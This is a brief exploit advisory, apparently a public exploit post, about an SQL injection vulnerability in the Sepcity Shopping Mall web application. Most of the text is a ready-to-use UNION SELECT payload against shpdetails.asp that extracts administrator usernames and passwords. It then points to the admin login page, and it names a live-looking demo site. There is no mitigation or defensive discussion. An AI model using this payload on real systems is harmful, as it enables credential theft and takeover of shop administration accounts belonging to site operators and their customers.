Sepcity Shopping Mall suffers from a remote SQL injection vulnerability in shpdetails.asp.
541fbf8d99ebbf95ba35c9832226ab3c45f14a787298ba49a418b8d8b90a06d2
#By Osmanizim
#Security Specialist
#Contacts > :( www.osmanizim.com
#Title: Shopping Mall <= SQL Injection Vulnerability.
#Demo : http://freeasp.sepcity.com/shopmall/default.asp
// Exploit -->
http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators
// Admin -->
http://localhost/shopmall/admlogin.asp?